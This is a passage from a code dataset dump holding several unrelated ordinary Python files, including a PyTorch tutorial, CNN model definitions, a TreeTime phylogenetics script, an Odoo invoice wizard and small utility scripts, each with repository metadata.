params['bath_act_of_terrorism']\n page.landscape_structure = params['landscape_structure']\n if params['landscape_structure']:\n page.landscape_structure_cost = params['landscape_structure_cost']\n page.landscape_structure_base_package = params['landscape_structure_base_package']\n page.go = params['go']\n if params['go']:\n page.go_cost = params['go_cost']\n page.go_common = params['go_common']\n page.loss_of_rent = params['loss_of_rent']\n if params['loss_of_rent']:\n page.loss_of_rent_cost = params['loss_of_rent_cost']\n page.loss_of_rent_wood_house = params['loss_of_rent_wood_house']\n page.loss_of_rent_stone_house = params['loss_of_rent_stone_house']\n\n # Цена\n page.raise_error()\n page.wait_calculation()\n page.raise_error()\n self.assertEqual(params['expected'], page.get_total(), \"Ожидаемая и полученная суммы не равны\")\n self.need_screenshot = False\n\n @parameterized.expand(\n load_data('house/house_plus/', load),\n testcase_func_name=customize_method_name)\n def test(self, *args):\n self._test(args[2])\n\n @parameterized.expand(\n load_data('house/house_plus/', load, smoke=True),\n testcase_func_name=customize_method_name)\n def smoke(self, *args):\n self._test(args[2])\n","sub_path":"vazhno/b2c/products/house/house_plus/test_pricing.py","file_name":"test_pricing.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416884726","text":"import turtle\nimport math\n\nt = turtle.Turtle()\nt.color('red', 'orange')\nt.speed(5)\n\nt.begin_fill()\nfor i in range(100):\n\tt.forward(10)\n\tt.left(math.sin(i/10)*25)\n\tt.left(20)\nt.end_fill()\n\nturtle.done()","sub_path":"turtle/experimento.py","file_name":"experimento.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"451015802","text":"import torch\nimport torch.nn.functional as F #包含激励函数\nimport matplotlib.pyplot as plt #画图工具包\na = torch.linspace(-1, 1, 100) #linspace()函数从(-1,1)的区间均匀地取100个值,返回一个一维张量 torch.Size([100])\nx = torch.unsqueeze(a, dim=1) #使用unsqueeze()函数能增加a的维度,原本a是一维的,现在x是二维 torch.Size([100, 1])\ny = x.pow(2)+0.2*torch.rand(x.size()) #加号后的部分作用是增加数据噪声\n\nprint(a.shape)\nprint(x.shape)\nprint(y.shape)\n#plt.scatter(x.data.numpy(),y.data.numpy()) #scatter()画散点图,plot()画连续图\n#plt.show()\n\n\nclass Net(torch.nn.Module): #继承torch的Module\n def __init__(self, n_feature, n_hidden, n_output):\n super(Net, self).__init__() #必须继承_init_()函数\n #定义网络的结构\n self.hidden = torch.nn.Linear(n_feature, n_hidden) #nn.Linear(input_size,output_size) 输入节点数&输出节点数\n self.predict = torch.nn.Linear(n_hidden, n_output)\n\n def forward(self, x):\n # 正向传播输入值, 神经网络分析出输出值\n x = F.relu(self.hidden(x))\n x = self.predict(x)\n return x\n\n\nnet = Net(n_feature=1, n_hidden=10, n_output=1)\n\nprint(net)\n\npara = list(net.parameters())\nprint(para)\n\noptimizer = torch.optim.SGD(net.parameters(), lr=0.2) #net的参数是何时初始化的?参数里有什么值\nloss_func = torch.nn.MSELoss()\n\nplt.ion()\nplt.show()\n\nfor t in range(100):\n prediction = net(x) #net虽然是一个object,但是也可以当作函数使用,具体可以查看_call_(),给net输入训练数据集x,输出预测数据\n loss = loss_func(prediction, y) #计算预测数据prediction和实际数值y之间的误差\n print(loss)\n optimizer.zero_grad() #梯度初始化为零\n loss.backward() #误差反向传播, 计算参数更新值\n optimizer.step() #将参数更新值施加到 net 的 parameters 上\n\n if t % 5 == 0:\n plt.clf()\n plt.scatter(x.data.numpy(), y.data.numpy())\n plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)\n plt.text(0.5, 0, 'Loss=%.4f' % loss.data.numpy(), fontdict={'size': 20, 'color': 'red'})\n plt.pause(0.1)\n\nplt.ioff()\nplt.show()\n\n","sub_path":"tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106130440","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport numpy as np\n \n\nip_map = Basemap(projection='robin', lon_0=0, resolution='c')\n\nwith open('geo.txt','r') as f:\n\tfor line in f.readlines():\n\t\tsrclong, srclat = line.split(',')\n\t\tsrclong=float(srclong)\n\t\tsrclat=float(srclat)\n\t\tx, y = ip_map(srclong, srclat)\n\t\tplt.plot(x,y, 'o', color='#ff0000', ms=2.7, markeredgewidth=0.5)\n\n\nip_map.drawcountries(color='#ffffff')\nip_map.fillcontinents(color='#cccccc',lake_color='#ffffff')\n\nplt.savefig('ip_map.png', dpi=600)\n","sub_path":"generatemap.py","file_name":"generatemap.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210776650","text":"import torch # モデル定義に使用\nimport torch.nn.functional as F # GAPの定義時に使用\nimport torch.nn as nn # 各モジュールの宣言に使用\nfrom torchvision import models\n\n# モデルの定義をまとめたファイル\n# 実装:VGGベースモデル,ResNet50ベースモデル,学習済みResNet50ベースモデル\n\n# モデル定義(VGGベースモデル)\nclass VGG_based(nn.Module):\n\n def __init__(self, num_class):\n super().__init__() #スーパークラスの初期化関数を実行(実行しないとモジュールの宣言時にエラーが発生する)\n\n # 畳み込���,Batch Normalization,ReLUを3回ずつ行うものを1ブロックとし,ブロックの最後にMaxPoolingによって解像度を落とす\n # VGG NetにはBatch Normalizationは含まれていないが,学習の効率化/安定化/精度向上が期待できるため導入\n #\n # Conv2d(input_channel, output_channel, kernel_size, padding)\n # 畳み込みを行うモジュール\n # input_channel : 入力チャネル数\n # output_channel : 出力チャネル数\n # kernel_size : 畳み込みカーネルの大きさ(intを入力すると(int, int)のタプルとして認識される)\n # padding : 縁の画素に対する畳み込みを行うためのpaddingを行うか(1以上で指定した数字分だけ画像の周囲に画素値0の画素を追加する)\n #\n # BatchNorm2d(channel)\n # Batch Normalizationを行うモジュール\n # Batch Normalization : ミニバッチ内のデータを平均0,標準偏差1になるように正規化を行うこと\n # channel : 入力チャネル数\n #\n # ReLU(inplace)\n # 活性化関数ReLUをかけるモジュール\n # inplace : 出力の保存のために入力の変数を用いるか(x = func(x)を許容するか)\n #\n # MaxPool2d(kernel_size, stride)\n # Max Poolingを行うモジュール\n # kernel_size : 比較を行う際に見る範囲(カーネルサイズ)の大きさ\n # stride : カーネルを何画素移動するか\n self.feature_extractor = nn.Sequential(\n nn.Conv2d(3, 64, 3, padding=1), #input:144×144×1 output:144×144×64\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, 3, padding=1), #input:144×144×64 output:144×144×64\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, 3, padding=1), #input:144×144×64 output:144×144×64\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(64, 128, 3, padding=1), #input:72×72×64 output:72×72×128\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, 3, padding=1), #input:72×72×128 output:72×72×128\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, 3, padding=1), #input:72×72×128 output:72×72×128\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(128, 256, 3, padding=1), #input:36×36×128 output:36×36×256\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, 3, padding=1), #input:36×36×256 output:36×36×256\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, 3, padding=1), #input:36×36×256 output:36×36×256\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(256, 512, 3, padding=1), #input:18×18×256 output:18×18×512\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 512, 3, padding=1), #input:18×18×512 output:18×18×512\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 512, 3, padding=1), #input:18×18×512 output:18×18×512\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n\n # 全結合層\n # 多層パーセプトロンにより必要な特徴の重み付けを行い識別を行う\n # 多層なので非線形識別が可能\n # Linear(input_dim, output_dim)\n # 全結合層\n # input_dim : 入力の次元数(全結合層は1次元配列が入力のため次元数はintでいい)\n # output_dim : 出力の次元数\n self.linear = nn.Sequential(\n nn.Linear(9*9*512, 2048), #input:9×9×256(1dim vec) output:1×1×2058\n nn.ReLU(inplace = True),\n nn.Linear(2048, 1024), #input:1×1×2048 output:1×1×1024\n nn.ReLU(inplace = True),\n nn.Linear(1024, 512), #input:1×1×1024 output:1×1×512\n nn.ReLU(inplace = True),\n )\n\n # クラス分類器(ArcFaceLossに含まれるため今回は使わない)\n self.classifier = nn.Linear(512, num_class)\n\n # 順伝播\n # 逆伝播は自動でやってくれる\n def forward(self, x):\n x = self.feature_extractor(x) # 特徴抽出\n x = x.view(-1, 9*9*512) # 1次元配列に変更\n x = self.linear(x) # 全結合層へ入力\n #x = self.classifier(x)\n\n return x\n\n# モデル定義(ResNet50ベース)\nclass ResNet_based(nn.Module):\n def __init__(self, num_classes):\n super().__init__()\n # Skip Connectionにより計算されない情報を送ることで層を重ねることによる初めの方の情報の欠落を防ぐ\n # 加えてデータの流れが分岐するため疑似的なアンサンブルモデルと捉えることが可能\n # 実装はhttps://www.bigdata-navi.com/aidrops/2611/を参考に行った\n #\n # 畳み込みを1回挿む\n self.head = nn.Sequential(\n nn.Conv2d(3, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n # Block 1\n self.block0 = self._building_block(256, channel_in=64)\n self.block1 = nn.ModuleList([\n self._building_block(256) for _ in range(2)\n ])\n self.conv2 = nn.Conv2d(256, 512, 1, stride=(2, 2))\n # Block 2\n self.block2 = nn.ModuleList([\n self._building_block(512) for _ in range(4)\n ])\n self.conv3 = nn.Conv2d(512, 1024, 1, stride=(2, 2))\n # Block 3\n self.block3 = nn.ModuleList([\n self._building_block(1024) for _ in range(6)\n ])\n self.conv4 = nn.Conv2d(1024, 2048, 1, stride=(2, 2))\n # Block 4\n self.block4 = nn.ModuleList([\n self._building_block(2048) for _ in range(3)\n ])\n self.avg_pool = GlobalAvgPool2d() # x.viewの代わりにGAPを使用\n self.fc = nn.Linear(2048, 512)\n self.out = nn.Linear(512, num_classes) # ArcFaceLossに含まれるため今回は使わない\n\n # 順伝播\n def forward(self, x):\n x = self.head(x)\n x = self.block0(x)\n for block in self.block1:\n x = block(x)\n x = self.conv2(x)\n for block in self.block2:\n x = block(x)\n x = self.conv3(x)\n for block in self.block3:\n x = block(x)\n x = self.conv4(x)\n for block in self.block4:\n x = block(x)\n x = self.avg_pool(x)\n x = self.fc(x)\n x = torch.relu(x)\n #x = self.out(x)\n #x = torch.log_softmax(x, dim=-1)\n\n return x\n\n def _building_block(self, channel_out, channel_in=None):\n if channel_in is None:\n channel_in = channel_out\n return ResBlock(channel_in, channel_out)\n\n\n# ResNetを構成するブロックを生成するクラス\n# 実装はhttps://www.bigdata-navi.com/aidrops/2611/を参考に行った\nclass ResBlock(nn.Module):\n def __init__(self, channel_in, channel_out):\n super().__init__()\n channel = channel_out\n\n self.block = nn.Sequential(\n nn.Conv2d(channel_in, channel, 1),\n nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, channel, 3, padding=1),\n nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, channel_out, 1, padding=0),\n nn.BatchNorm2d(channel_out),\n )\n self.shortcut = self._shortcut(channel_in, channel_out)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n h = self.block(x)\n shortcut = self.shortcut(x)\n x = self.relu(h + shortcut)\n return x\n\n def _shortcut(self, channel_in, channel_out):\n if channel_in != channel_out:\n return self._projection(channel_in, channel_out)\n else:\n return lambda x: x\n\n def _projection(self, channel_in, channel_out):\n return nn.Conv2d(channel_in, channel_out, 1, padding=0)\n\n# GAPを計算するクラス\n# 実装はhttps://www.bigdata-navi.com/aidrops/2611/を参考に行った\nclass GlobalAvgPool2d(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, x):\n return F.avg_pool2d(x, kernel_size=x.size()[2:]).view(-1, x.size(1))\n\n\n# 学習済みResNet50を利用(全結合層のみ定義し直し)\n# torchvisionに含まれるResNet50学習済みモデルを使用\n# 実装はhttps://pytorch.org/vision/0.8/_modules/torchvision/models/resnet.htmlを参考に行った\nclass PretrainedResNet(nn.Module):\n def __init__(self, embedding_size):\n super().__init__()\n self.pretrained_resnet = models.resnet50(pretrained=True)\n self.fc = nn.Linear(2048, 512) #学習済みresnetの全結合層のみ入れ替え\n\n def forward(self, x):\n x = self.pretrained_resnet.conv1(x)\n x = self.pretrained_resnet.bn1(x)\n x = self.pretrained_resnet.relu(x)\n x = self.pretrained_resnet.maxpool(x)\n x = self.pretrained_resnet.layer1(x)\n x = self.pretrained_resnet.layer2(x)\n x = self.pretrained_resnet.layer3(x)\n x = self.pretrained_resnet.layer4(x)\n x = self.pretrained_resnet.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x) #最終的なclassifierはArcFaceLossに含まれるため省略\n return x\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117215952","text":"#!/usr/bin/env python3\nimport subprocess\nimport shlex\nfrom Bio import Phylo\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nimport matplotlib.pyplot as plt\nimport treetime as tt\nfrom treetime import TreeTime\nfrom treetime import wrappers\nfrom treetime.utils import parse_dates\nimport pandas as pd\nimport argparse\nimport ast\nimport csv\n\n\ndef label_nodes(tre):\n\tnode_counter=0\n\tfor item in tre.get_nonterminals():\n\t\titem.confidence = None\n\t\tif item.name is None:\n\t\t\titem.name = 'NODE_'+format(node_counter, '07d')\n\t\t\tnode_counter+=1\n\treturn(tre)\n\n\ndef make_regions_dict(wi_file, metadata_file):\n\twi_regions = pd.read_csv(wi_file)\n\twi_tips= {item['Sample Name']: item['wisconsin_catchment_area'] for \n\t\t\t\t\tindex, item in wi_regions.iterrows()}\n\tmetadata = pd.read_csv(metadata_file, sep='\\t')\n\tusa_tips = {item['strain']: item['division'] for index, item in metadata[metadata['country'] == 'USA'].iterrows()}\n\tglobal_tips = {item['strain']: item['country'] for index, item in metadata[metadata['country'] != 'USA'].iterrows()}\n\tregions = wi_tips.copy()\n\tincluded_keys = set(wi_tips.keys())\n\tfor key, value in usa_tips.items():\n\t\tif key not in included_keys:\n\t\t\tregions[key] = value\n\tincluded_keys.add(item for item in set(usa_tips.items()))\n\tfor key, value in global_tips.items():\n\t\tif key not in included_keys:\n\t\t\tregions[key] = value\n\treturn(regions)\n\n\ndef infer_timetree(tre, aln_file, dates, outgroup, resolve, out_path):\n\ttre_path = f'{out_path}/ml.newick'\n\twith open(tre_path, 'w') as out_file:\n\t\tPhylo.write(tre, out_file, 'newick', format_branch_length='%1.8f')\n\ttre = TreeTime(gtr='JC69', tree=tre, precision='auto',\n\t aln=aln_file, verbose=2, dates=dates)\n\t# from NextStrain Augur refine.py\n\t# treetime clock filter will mark, but not remove bad tips\n\ttre.clock_filter(reroot=outgroup, n_iqd=4, plot=False) \n\t# remove them explicitly\n\tleaves = [x for x in tre.tree.get_terminals()]\n\tfor n in leaves:\n\t\tif n.bad_branch:\n\t\t\ttre.tree.prune(n)\n\t\t\tprint('pruning leaf ', n.name)\n\t# fix treetime set-up for new tree topology\n\ttre.prepare_tree()\n\tprint(f'resolve polytomies: {resolve}')\n\ttre.run(root=outgroup, infer_gtr=True, max_iter=2,\n\t branch_length_mode='auto', resolve_polytomies=resolve,\n\t time_marginal='assign', vary_rate=0.0004, fixed_clock_rate=0.0008)\n\ttimes = pd.DataFrame({'name': [item.name for item in tre.tree.find_clades()],\n\t\t\t\t\t\t 'date': [item.date for item in tre.tree.find_clades()],\n\t\t\t\t\t\t 'lower': [list(tre.get_max_posterior_region(item))[0] for item in tre.tree.find_clades()],\n\t\t\t\t\t\t 'upper': [list(tre.get_max_posterior_region(item))[1] for item in tre.tree.find_clades()]}, \n\t\t\t\t\t\t index = range(0, len([item for item in tre.tree.find_clades()])))\n\ttimes.to_csv(tre_path.replace('.newick', '_refined_node_times.csv'))\n\t# Saves refined tree\n\twith open(tre_path.replace('.newick', '_refined.newick'), 'w') as out_file:\n\t\tPhylo.write(tre.tree, out_file, 'newick', format_branch_length='%1.8f')\n\ttre.branch_length_to_years()\n\twith open(tre_path.replace('.newick', '_refined_time.newick'), 'w') as out_file:\n\t\tPhylo.write(tre.tree, out_file, 'newick', format_branch_length='%1.8f')\n\treturn(tre)\n\n\ndef infer_mugration(tre, aln_file, regions, out_path):\n\ttre, letter_to_state, state_to_letter = \\\n\t\twrappers.reconstruct_discrete_traits(tre, regions, \n\t\t\tsampling_bias_correction=2.5)\n\tpd.DataFrame({'letter':list(letter_to_state.keys()), \n\t\t\t\t \t\t\t\t'region': list(letter_to_state.values())}).\\\n\t\t\t\t\t\t\t\tto_csv(f'{out_path}/ml_refined_regions.csv', index=False)\n\tpd.DataFrame({'name': [item.name for item in tre.tree.find_clades()],\n\t\t\t\t 'state': [list(item.marginal_profile[0]) for item in tre.tree.find_clades()]}).\\\n\t\t\t\t\tto_csv(f'{out_path}/ml_refined_node_states.csv', index=False)\n\treturn(tre, letter_to_state, state_to_letter)\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\t# input files\n\tparser.add_argument('--out_dir', \n\t\t\t\t\t\thelp='output directory', \n\t\t\t\t\t\tdefault='results')\n\tparser.add_argument('--aln_file', \n\t\t\t\t\t\thelp='alignment with nearest neighbors', \n\t\t\t\t\t\tdefault='data/subsampled_alignment_neighbors.fasta')\n\tparser.add_argument('--tree_file', \n\t\t\t\t\t\thelp='tree from which to estimate clock rate',\n\t\t\t\t\t\tdefault='results/subsampled_alignment_neighbors.fasta.treefile')\n\tparser.add_argument('--metadata_file',\n\t\t\t\t\t\thelp='metadata file',\n\t\t\t\t\t\tdefault='data/metadata_adjusted.tsv')\n\tparser.add_argument('--mke_dane_file',\n\t\t\t\t\thelp='file with list of sequences from Dane and MKE',\n\t\t\t\t\tdefault='data/MKEvsDane.csv')\n\tparser.add_argument('--outgroup',\n\t\t\t\t\thelp='Outgroup to use in tree',\n\t\t\t\t\tdefault='Wuhan/Hu-1/2019')\n\tparser.add_argument('--resolve', dest='resolve', action='store_true')\n\tparser.add_argument('--no-resolve', dest='resolve', action='store_false')\n\tparser.set_defaults(resolve=False)\n\targs = parser.parse_args()\n\tsubprocess.run(shlex.split(f'mkdir {args.out_dir}'))\n\tregions_dict = make_regions_dict(args.mke_dane_file, args.metadata_file)\n\ttre = Phylo.read(args.tree_file, 'newick')\n\ttre.root_with_outgroup(args.outgroup)\t\t# operates in place\n\ttre = label_nodes(tre)\t# labels nodes of tree\n\tdates = parse_dates(args.metadata_file)\t# parses tip dates\n\ttimetree_tre = infer_timetree(tre, args.aln_file, dates, args.outgroup, args.resolve, args.out_dir)\n\t# infers mugration\n\ttre, letter_to_state, state_to_letter = \\\n\t\tinfer_mugration(timetree_tre.tree, args.aln_file, regions_dict, args.out_dir)\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"data_raw/Source Data/introductions/code/infer_clock_mugration.py","file_name":"infer_clock_mugration.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640896567","text":"\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass PosCreateInvoice(models.TransientModel):\n\n _name = 'pos.create.invoice'\n\n start_date = fields.Datetime(required=True)\n end_date = fields.Datetime(required=True)\n partner_id = fields.Many2one('res.partner', 'Customer', required=True)\n is_load = fields.Boolean('Load')\n pos_order_ids = fields.Many2many('pos.order', 'pos_order_invoice')\n\n def get_pos_order(self):\n\n rec = self.env['pos.order'].search([('date_order', '>=', self.start_date), (\n 'date_order', '<=', self.end_date), ('partner_id', '=', self.partner_id.id), ('state', '=', 'credit_note')])\n self.pos_order_ids = [(6, 0, rec.ids)]\n self.is_load = True\n return {\n 'name': _(\"Create Invoice\"),\n 'view_mode': 'form',\n 'view_id': False,\n 'res_model': 'pos.create.invoice',\n 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': self.env.context\n }\n\n def pos_create_invoice(self):\n line_ids = []\n inv_val = {}\n inv_val.update(\n {'partner_id': self.partner_id.id, 'type': 'out_invoice'})\n for order in self.pos_order_ids:\n name = order.name + ' Date :- ' + str(order.date_order.date())\n line_val_rec = {\n 'name': name,\n 'display_type': 'line_section'\n }\n line_ids.append((0, 0, line_val_rec))\n for line in order.lines:\n line_val = {\n 'product_id': line.product_id.id,\n 'name': line.product_id.name,\n 'quantity': line.qty,\n 'price_unit': line.price_unit,\n 'discount': line.discount,\n 'tax_ids': [(6, 0, line.tax_ids.ids)],\n }\n line_ids.append((0, 0, line_val))\n inv_val.update({'invoice_line_ids': line_ids})\n rec = self.env['account.move'].create(inv_val)\n self.pos_order_ids.write({'state': 'done'})\n return {\n 'name': _(\"Invoices\"),\n 'view_mode': 'form',\n 'view_id': False,\n 'res_model': 'account.move',\n 'res_id': rec.id,\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': self.env.context\n }\n","sub_path":"fan_coffee_pos 3/wizard/create_invoice.py","file_name":"create_invoice.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154710342","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n Author:jason\n date:2018/3/17\n-------------------------------------------------\n Change Activity:2018/3/17:\n-------------------------------------------------\n\"\"\"\nfrom stanfordcorenlp import StanfordCoreNLP\nfrom util.io import IOUtil\n\nif __name__ == '__main__':\n\tinput = 'sentences.utf-8'\n\ttext = IOUtil.load_files([input])\n\t# print(text)\n\t\n\twords = []\n\t\n\tnlp = StanfordCoreNLP('http://corenlp.run', port=80, lang='zh')\n\t\n\tfor line in text:\n\t\tl = nlp.word_tokenize(line)\n\t\twords.extend(' '.join(l))\n\t\twords.append('\\n')\n\tnlp.close()\n\tIOUtil.save_to_file(words, 'words.utf-8')\n","sub_path":"basic/2word_segment.py","file_name":"2word_segment.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155311395","text":"\nimport joblib\nimport numpy as np\nfrom sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Lambda\n\n# calculates the square root of the square of a tensor maintaining the dimension (m,s1,n) --> (m,s1,1)\ndef srs(tensor):\n\n tensor_srs = Lambda(lambda x: tf.math.sqrt(\n tf.math.reduce_sum(\n tf.math.square(x), axis=-1, keepdims=True\n )\n ))(tensor)\n\n return tensor_srs\n\n\ndef load_model(X: None, y: None, seed: None, test_size: None, model: None):\n # split data into train and test sets\n seed = seed\n test_size = test_size\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\n\n # load model from file\n loaded_model = joblib.load(model)\n\n # predictions\n predictions = loaded_model.predict(X_test)\n\n # evaluate predictions\n return r2_score(y_test, predictions), mean_squared_error(y_test, predictions), mean_absolute_error(y_test,\n predictions)\ndef mean_absolute_percentage_error(y_true, y_pred):\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return np.median(np.abs((y_true - y_pred) / y_true)) * 100\n\nclass BatchPreProcessor(object):\n\n def normalize(self, x, vmax, vmin):\n self.v = (x - vmin) / (vmax - vmin)\n return self.v\n\n def normalize_a_b(self, x, vmax, vmin, a, b):\n self.v = (b - a) * ((x - vmin) / (vmax - vmin)) + a\n return self.v\n\n def positive(self, x):\n return -x if x < 0 else x\n\n def normalize_matrix(self, x):\n self.f = np.vectorize(self.normalize, otypes=[np.float])\n for i in range(x.shape[1]):\n self.vmax = np.max(x[:, i])\n self.vmin = np.min(x[:, i])\n x[:, i] = self.f(x[:, i], self.vmax, self.vmin)\n return x\n\n def normalize_matrix_a_b(self, x, a, b):\n self.f = np.vectorize(self.normalize_a_b, otypes=[np.float])\n self.vmax = np.max(x)\n self.vmin = np.min(x)\n for c in range(x.shape[1]):\n for r in range(x.shape[0]):\n x[r, c] = self.normalize_a_b(x[r, c], self.vmax, self.vmin, a, b)\n return x\n\n def positive_matrix(self, x):\n self.f = np.vectorize(self.positive, otypes=[np.float])\n for c in range(x.shape[1]):\n for r in range(x.shape[0]):\n x[r, c] = self.f(x[r, c])\n return x\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"182713125","text":"n=int(input(\"Enter the limit: \"))\npn=1\ncn=0\nwhile(n):\n print(cn)\n cn=cn+pn\n pn=cn-pn\n n=n-1\nprint(\"Press any key to continue...\")\ninput()\n \n","sub_path":"Python programs/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124694607","text":"\n\nfrom xai.brain.wordbase.nouns._jackhammer import _JACKHAMMER\n\n#calss header\nclass _JACKHAMMERS(_JACKHAMMER, ):\n\tdef __init__(self,): \n\t\t_JACKHAMMER.__init__(self)\n\t\tself.name = \"JACKHAMMERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"jackhammer\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_jackhammers.py","file_name":"_jackhammers.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"1897964","text":"from i3Deep import utils\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport os\r\nimport json\r\nimport copy\r\nimport shutil\r\nfrom pathlib import Path\r\nimport SimpleITK as sitk\r\n\r\nimage_path = \"/gris/gris-f/homelv/kgotkows/datasets/nnUnet_datasets/nnUNet_raw_data/nnUNet_raw_data/Task070_guided_all_public_ggo/imagesTs1/\"\r\nkgu_image_path = \"/gris/gris-f/homelv/kgotkows/datasets/covid19/UK_Frankfurt3_dataset/images/\"\r\n\r\nimage_filenames = utils.load_filenames(image_path)\r\nkgu_image_filenames = utils.load_filenames(kgu_image_path)\r\n\r\nmapping = []\r\nkgu_shapes = {}\r\n\r\nfor kgu_image_filename in tqdm(kgu_image_filenames, desc=\"KGU\"):\r\n kgu_name = os.path.basename(kgu_image_filename)[:-7]\r\n # kgu_image, _, _, _ = utils.load_nifty(kgu_image_filename)\r\n # kgu_shapes[kgu_name] = kgu_image.shape\r\n # Set up the reader and get the file information\r\n reader = sitk.ImageFileReader()\r\n reader.SetFileName(kgu_image_filename) # Give it the mha file as a string\r\n reader.LoadPrivateTagsOn() # Make sure it can get all the info\r\n reader.ReadImageInformation() # Get just the information from the file\r\n shape = reader.GetSize() # If you want the x, y, z\r\n kgu_shapes[kgu_name] = shape\r\n\r\nfor image_filename in tqdm(image_filenames, desc=\"Image\"):\r\n name = os.path.basename(image_filename)[:-7]\r\n image, affine, spacing, header = utils.load_nifty(image_filename)\r\n found = False\r\n for kgu_image_filename in tqdm(kgu_image_filenames, desc=\"KGU\"):\r\n kgu_name = os.path.basename(kgu_image_filename)[:-7]\r\n if image.shape == kgu_shapes[kgu_name]:\r\n kgu_image, _, _, _ = utils.load_nifty(kgu_image_filename)\r\n\r\n if np.allclose(image, kgu_image, atol=5):\r\n mapping.append({\"Name\": name, \"KGU\": kgu_name})\r\n print(\"{} = {}\".format(name, kgu_name))\r\n kgu_image_filenames.remove(kgu_image_filename)\r\n found = True\r\n break\r\n if not found:\r\n raise RuntimeError(\"No mapping found!\")\r\nprint(mapping)\r\n","sub_path":"i3Deep/mask_recommendation/compute_mapping.py","file_name":"compute_mapping.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"178093565","text":"class Connection(object):\n def __init__(self, filename):\n \"\"\"\n Takes a filename, but doesn't do anything with it.\n (The filename will be used in a future project).\n \"\"\"\n self.myDatabase = Database()\n #_ALL_DATABASES[self.myDatabase]\n\n def execute(self, statement):\n \"\"\"\n Takes a SQL statement.\n Returns a list of tuples (empty unless select statement \n with rows to return).\n \"\"\" \n\n\n #query = 'INSERT INTO student VALUES (\"Tyler\" ,4.0);'\n #answer = [\"SELECT\", \"*\", \"FROM\", \"pokemon\", \"ORDER\", \"BY\", \"id\", \",\", \"type\", \";\"]\n result = []\n while statement:\n token, rest = get_first_token(statement)\n result.append(token)\n statement = rest\n\n newList = []\n items = '\"(),;'\n for item in result:\n if item in items:\n pass\n else:\n newList.append(item)\n\n\n \n statement = newList\n \n \n 